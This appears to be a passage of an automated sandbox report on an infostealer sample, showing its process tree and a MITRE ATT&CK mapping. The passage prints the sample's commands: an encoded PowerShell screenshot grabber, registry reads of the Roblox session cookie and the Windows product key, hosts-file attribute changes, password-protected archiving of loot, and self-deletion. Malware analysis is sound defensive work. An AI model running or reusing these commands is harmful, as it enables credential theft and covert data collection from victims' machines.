  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:4032
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:1832
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2452
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\etyhsu2u\etyhsu2u.cmdline"
        5⤵
        
        PID:4368
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF0C8.tmp" "c:\Users\Admin\AppData\Local\Temp\etyhsu2u\CSC22746AA2F5D4D85ACAB824C42761ED1.TMP"
        6⤵
        
        PID:4968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4804
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:4044
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3228
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:1720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4816
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:1524
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2392
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4496
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3380
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4724
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:4388
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:3880
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:2080
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI45002\rar.exe a -r -hp"dollar" "C:\Users\Admin\AppData\Local\Temp\HBzEq.zip" *"
    3⤵
    PID:4604
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4548
  - - C:\Users\Admin\AppData\Local\Temp\_MEI45002\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI45002\rar.exe a -r -hp"dollar" "C:\Users\Admin\AppData\Local\Temp\HBzEq.zip" *
      4⤵
      Executes dropped EXE
      PID:1776
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:888
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:3612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:936
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:1760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:468
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:4256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:4152
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:4168
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:2280
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\Builder.exe""
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:5408
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:5572

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:2100

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}
1⤵
PID:4044

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:4808

C:\Program Files\Mozilla Firefox\private_browsing.exe
"C:\Program Files\Mozilla Firefox\private_browsing.exe"
1⤵
PID:1420
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe" -private-window
  2⤵
  PID:4488
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -private-window
    3⤵
    - Checks processor information in registry
    - Modifies registry class
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of SetWindowsHookEx
    PID:3972
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1996 -parentBuildID 20240401114208 -prefsHandle 1924 -prefMapHandle 1916 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {08082efe-c2c8-4acf-93a9-600fbe84940a} 3972 "\\.\pipe\gecko-crash-server-pipe.3972" gpu
      4⤵
      PID:736
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2412 -parentBuildID 20240401114208 -prefsHandle 2340 -prefMapHandle 2332 -prefsLen 23716 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {773b9ed0-0c85-4d90-b817-600df74c4ca6} 3972 "\\.\pipe\gecko-crash-server-pipe.3972" socket
      4⤵
      Checks processor information in registry
      PID:2448
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3064 -childID 1 -isForBrowser -prefsHandle 2972 -prefMapHandle 2968 -prefsLen 24665 -prefMapSize 244658 -jsInitHandle 1220 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b0953e49-f25b-4347-bdd9-d5e7e64342c5} 3972 "\\.\pipe\gecko-crash-server-pipe.3972" tab
      4⤵
      PID:936
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4344 -childID 2 -isForBrowser -prefsHandle 4336 -prefMapHandle 776 -prefsLen 29014 -prefMapSize 244658 -jsInitHandle 1220 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {adf5ca87-e9ec-467f-a4c7-5009425634e0} 3972 "\\.\pipe\gecko-crash-server-pipe.3972" tab
      4⤵
      PID:464
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4824 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 1608 -prefMapHandle 4816 -prefsLen 32694 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {00de2246-f262-4590-b9f8-3666fb914c74} 3972 "\\.\pipe\gecko-crash-server-pipe.3972" utility
      4⤵
      Checks processor information in registry
      PID:5592
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5384 -childID 3 -isForBrowser -prefsHandle 5404 -prefMapHandle 5400 -prefsLen 27148 -prefMapSize 244658 -jsInitHandle 1220 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6aaebe5d-d3f0-46e8-ab98-77601836ee5d} 3972 "\\.\pipe\gecko-crash-server-pipe.3972" tab
      4⤵
      PID:3112
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5544 -childID 4 -isForBrowser -prefsHandle 5552 -prefMapHandle 5556 -prefsLen 27148 -prefMapSize 244658 -jsInitHandle 1220 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {182043ba-6ee4-41b7-8d11-197cffe09206} 3972 "\\.\pipe\gecko-crash-server-pipe.3972" tab
      4⤵
      PID:1584
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5736 -childID 5 -isForBrowser -prefsHandle 5744 -prefMapHandle 5748 -prefsLen 27148 -prefMapSize 244658 -jsInitHandle 1220 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9a94d8ab-32b6-4c78-bf4d-8927eec36f4e} 3972 "\\.\pipe\gecko-crash-server-pipe.3972" tab
      4⤵
      PID:2452
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5780 -childID 6 -isForBrowser -prefsHandle 5788 -prefMapHandle 5792 -prefsLen 27229 -prefMapSize 244658 -jsInitHandle 1220 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ff3cf8e9-e3b2-4f9b-b942-74f53e7f07de} 3972 "\\.\pipe\gecko-crash-server-pipe.3972" tab
      4⤵
      PID:5380
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6048 -childID 7 -isForBrowser -prefsHandle 4992 -prefMapHandle 4368 -prefsLen 28016 -prefMapSize 244658 -jsInitHandle 1220 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b465a9eb-763b-429b-b7f6-27fdeee483b4} 3972 "\\.\pipe\gecko-crash-server-pipe.3972" tab
      4⤵
      PID:1848
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4860 -parentBuildID 20240401114208 -prefsHandle 5248 -prefMapHandle 6440 -prefsLen 34029 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1c2bf0a3-f759-4799-96d9-401f2823d310} 3972 "\\.\pipe\gecko-crash-server-pipe.3972" rdd
      4⤵
      PID:3768
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6512 -parentBuildID 20240401114208 -sandboxingKind 1 -prefsHandle 6432 -prefMapHandle 6436 -prefsLen 34029 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {513a03a5-a636-41fb-b947-9c38196393b8} 3972 "\\.\pipe\gecko-crash-server-pipe.3972" utility
      4⤵
      Checks processor information in registry
      PID:3528

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
1⤵
PID:516

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:3380

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:1832

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4ec 0x46c
1⤵
PID:2328

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

